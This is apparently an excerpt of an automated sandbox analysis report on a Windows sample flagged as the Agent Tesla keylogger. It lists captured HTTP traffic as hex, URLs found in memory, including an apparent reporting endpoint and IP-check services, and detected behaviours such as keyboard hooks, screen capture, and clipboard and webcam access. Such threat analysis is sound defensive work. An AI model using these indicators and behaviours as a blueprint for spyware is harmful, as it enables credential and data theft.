Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:59:50 GMTserver: LiteSpeedplatform: hostingerpanel: hpanelData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 39 3a 35 30 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:59:50 GMTserver: LiteSpeedplatform: hostingerpanel: hpanelData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:59:50 GMTserver: LiteSpeedplatform: hostingerpanel: hpanelData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6

Source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	String found in binary or memory: http://DynDns.com
Source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	String found in binary or memory: http://Paltalk.com
Source: CTF Loader.exe, 00000005.00000002.2116291831.0000000003112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: CTF Loader.exe, 00000005.00000002.2116291831.0000000003112000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2116291831.000000000310A000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2116291831.00000000030FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2116291831.00000000030C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	String found in binary or memory: http://checkip.dyndns.org/E
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F6D000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003134000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003119000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.000000000268D000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002814000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.000000000263C000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002618000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000026F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://eygds.info
Source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	String found in binary or memory: http://eygds.info/api.php
Source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr	String found in binary or memory: http://no-ip.com
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000005.00000002.2116291831.00000000030FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003119000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002600000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000027EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf
Source: ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=se
Source: ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::s
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.lo
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfLR
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&l
Source: ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: ZOYGRL1ePa.exe, 00000000.00000002.4121150441.00000000064F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2G
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033l
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfLR
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logou
Source: CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfLR
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003119000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002600000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000027EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003119000.00000004.00000800.00020000.00000000.sdmp, ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002600000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.00000000027EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xa8WoMjimcU1L20qza.org
Source: ZOYGRL1ePa.exe, 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, CTF Loader.exe, 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xa8WoMjimcU1L20qza.orgt-

Key, Mouse, Clipboard, Microphone and Screen Capturing

Detected Agent Tesla keylogger

Source: ZOYGRL1ePa.exe, 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	Memory string: get_Clipboard
Source: ZOYGRL1ePa.exe, 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	Memory string: set_Sendwebcam
Source: ZOYGRL1ePa.exe, 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	Memory string: get_ComputerName
Source: CTF Loader.exe, 00000004.00000002.4121957565.00000000065B0000.00000004.08000000.00040000.00000000.sdmp	Memory string: get_Username

Contains functionality to capture screen (.Net source)

Source: ZOYGRL1ePa.exe, JA.cs	.Net Code: WSX
Source: CTF Loader.exe.0.dr, JA.cs	.Net Code: WSX

Installs a global keyboard hook

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\ZOYGRL1ePa.exe			Jump to behavior
